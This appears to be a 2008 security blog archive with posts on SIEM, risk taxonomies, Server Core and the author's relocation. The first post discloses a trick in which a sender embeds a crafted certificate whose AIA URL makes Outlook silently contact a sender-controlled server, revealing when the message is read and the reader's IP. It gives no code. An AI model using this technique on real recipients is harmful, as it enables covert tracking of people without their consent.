Monday, June 30, 2008

Unauthorized reading confirmation on Outlook

Last month, during the a exam item writing workshop for the CISSP-ISSAP certification, I got an idea about how a malicious e-mail sender could try to get a unseen by the recipient reading confirmation, including the IP address of the recipient. I was talking about S/MIME messages and I thought about the signature validation process, where some of the steps could require external information (like a CRL) to be accessed. The interesting part of it is that the location of this information can be included in the message itself, as the PKCS#7 package can also include the certificate used to generate the signature.I went into Microsoft documentation about the validation process from Outlook, and found this:(reference: http://technet.microsoft.com/en-us/library/bb457027.aspx#EKAA)When the first certificate in the chain is validated, the following process takes place. 1.     The chaining engine will attempt to find the certificate of the CA that issued the certificate being examined. The chaining engine will inspect the local system certificate stores to find the parent CA certificate. The local system stores include the CA store, the Root store, and the Enterprise Trust store. If the parent CA certificate is not found in the local system certificate stores, the parent CA certificate is downloaded from one of the URLs available in the inspected certificates AIA extensions. The paths are built without signature validation at this time because the parent CA certificate is required to verify the signature on a certificate issued by the parent CA.2.     For all chains that end in a trusted root, all certificates in the chain are validated. This involves the following steps.*           Verify that each certificate's signature is valid.*           Verify that the current date and time fall within each certificate's validity period.*           Verify that each certificate is not corrupt or malformed.3.     Each certificate in the certificate chain is checked for revocation status. The local cache is checked to see if a time valid version of the issuing CA's base CRL is available in the cache. If the base CRL is not available in the local cache, or the version in the local cache has expired, the base CRL is downloaded from the URLs available in the CDP extension of the evaluated certificate. If available, it is confirmed that the certificate's serial number is not included in the CA's base CRL.As described, the recipient system will try to gather the CA certificate from a URL that is specified on the signers' certificate, that is embedded in the signed message. A specially crafted certificate can be generated with an AIA (Authority Information Access) containing an URL controlled by the malicious sender. By doing that the sender will immediately know when the message recipient read the message on Outloook, even if the certificate is untrusted (so you won't need a certificate from a Trusted CA to be able to do that). I performed  some tests that confirmed this scenario. Other e-mail clients like Mozilla Thunderbird and Lotus Notes have not presented the same behavior. It seems that only Outlook implements this part of RFC2459. It's behaving in the right way, but I believe that the user should have the ability to disable it.

Here is a sample of a web access from the recipient of a message crafted like that. On this case, the AIA address included in the certificate was poitining to the  "http://www.securitybalance.com/ca.html" URI.

10.10.10.31 - - [12/May/2008:15:47:43 -0400] "GET /ca.html HTTP/1.1" 200 116 "-" "Microsoft-CryptoAPI/5.131.2600.3311"
(anonymized IP address)

Wednesday, June 25, 2008

SIEM dead, time for search?

This is what Raffy is saying:"Some of the problems I see with Security Information Management are (the first four are adapted from the Gartner IDS press release):

  • False positives in correlation rules

  • Burden on the IS organization by requiring full-time monitoring

  • A taxing incident-response process

  • An inability to monitor events at rates greater than 10.000 events per second

  • High cost of maintaining and build new adapters

  • Complexity of modeling environment
However, the biggest problem lies in the fixed event schema. SIMs were built for network-based attacks. They are good at dealing with firewall, IDS, and maybe vulnerability data. Their database schema is built for that. So are the correlation rules. Moving outside of that realm into application layer data and other types of logs can get hard. Fields don’t match up anymore and the pre-built correlation rules don’t fit either.We need a new approach. We need an approach that can deal with all kinds of data. An approach that deals with multi-line messages, with any type of fields, even with entire files as entities. There is a need for a system that can collect data at rates of 100.000 events a second and still perform data analysis. It needs to support large quantities of analytical rules, not just a limited set. The system needs to be easy to use and absorb knowledge from the users.The solution is called IT search."I really agree on the value of IT search, but I believe we have some confusion over the main objectives of each tool. If you are thinking about data mining and a more deep analysis of log data, maybe searching is really a better approach. What I really question is using searching for alerting purposes. I don't think search based architectures for a "log analysis IDS" scale.Raffy hits the point when he mentions that SIEMs target network based devices. I have seen people working to integrate logs from different sources (applications) on those tools having a hard time with the vendors, who simply can't understand the notion of using other log data besides routers, firewalls and IDSes.Of course that logs from applications are not as simple as logs from network devices. Maybe that's why the vendors are avoiding them. They want to sell their products as plug and play boxes, and you can't have a plug and play installation when dealing with custom applications. What I believe is that a effective SIEM (or, if you don't want to define the technology behind it, a consolidated log monitoring) solution installation is more similar to a ERP (or Identity Management) deployment than to an antivirus deployment. If vendors could improve their products not by including more supported log formats but by delivering a fast an easy way to build log parsers, together with a flexible model for the entities that the tool and its rules can work with it would be quite easier to deploy them to provide better value and integrating more log sources.The IAM tools evolved the same way. Since the beginning they could work with LDAP, ActiveDirectory, RACF and other famous identity repositories. The challenge for the adopters, however, was not on integrating these tools but those old legacy applications. The IAMs that have better "universal adapters" are those that can generate the best results. I think it would be the same for SIEMs. All of them can work with CEE or something similar, but those with easy (and intelligent) tools to accept different sources will bring more benefit to the customers. Even search technology can be used in order to do that.So, don't blame SIEM tools, but their architects. When these people can understand where the biggest value for those tools is we will start to see huge benefits from them.

Wednesday, June 18, 2008

Open Group Risk Management "taxonomy"

I was reading this:

"With a goal of getting IT professionals to use standard terminology and eliminate ambiguity in expressing important risk-management concepts, the Open Group is finalizing a 50-page compendium of "risk-management and analysis taxonomy."

The Open Group Security Forum's risk taxonomy of about 100 expressions will not only address seemingly simple words such as threat, vulnerability and risk, but less common terms such as control strength."I was thinking, why these guys are doing it when there are stuff like ISO Guide 73, ISO27005 and ISO27000 published or in their way to be published?

This is why we asked so much for Server Core

This study from Jeff Jones blog show why the Server Core feature of Windows Server 2008 was so expected by security professionals. We can see a 40% reduction on the vulnerability numbers for a server running Windows if it was using something like Server Core. My main concern now is if software providers will enable their products to run over a Server Core server. It would be a shame to have this feature and can't use it because some piece of software demands Solitaire to be installed in order to run :-)

Friday, June 13, 2008

I'm back

I'm back. OK, almost. Today I spent two hours reading lots of accumulated RSS news, blog postings and others. I was glad to see that nothing very exciting happened during the last weeks, when I was moving to Toronto and wasn't able to follow the news and post on the blog. Now my life is slowly getting into something we may call "routine", so I think it's time to resume the activities of this blog.First, it seems that there are some good stuff from Mogull and Schneier. I'll read their posts as soon as possible to see if there is something I can add about.Today I went to Infosecurity Toronto. I was impressed on how small the exhibition was. Someone told me that the owners of the event did something weird on the marketing side, starting the negotiation of space and sponsorships too late. However, it was good to go there and take a quick look into the local security market. As always, conferences are those places where there are lots of vendors and not a single customer :-)I'm still looking for a job here. I'm having some good conversations with some pretty interesting companies, I hope to be employed by the end of this month.One interesting thing to mention here is that during my last week in Brazil I was hacked. Yes. I'm not ashamed to say that, specially because I'm aware that security professionals draw more attention from potential attackers. What happened was that I made two mistakes related to my personal password management "policy". I was using the same password to services supposed to be less low-risk to me. The first mistake was to consider 3 services that have higher risk implied as "low risk" (actually, I couldn't even remember I was using that pwd on them - it was something very automatic for me) and the second was to use that password on a very target and potentially insecure service. There is a small group of self-called "hackers" in Brazil that are trying to cause problems to the key names of Information Security of the country. Unfortunately, I am on that list. As I was caught in the middle of my relocation I was unable to follow a lot of incident response procedures I would like to, but I'm also aware that some of the others that are being targeted by this group are doing that. I won't even talk too much about it as it seems that what they are really looking for is that people talk about them. This, however, is interesting as a reminder for me that as a security professional I need to be a little more paranoid about security on my personal stuff.That's all for now. I hope to able to find more interesting stuff to write about again. I'm keeping my personal "in portuguese" blog updated with my impressions about my new city, but this one needs some special care too. I'll try harder.

Thursday, June 5, 2008

I didn't quit the blogging stuff

I know that there are ages since I wrote here last, but I'm finally putting together what I need here in Toronto and I believe that in a few days I'll resume not only my blogging but my twitter presence. Don't unsubscribe, dear readers!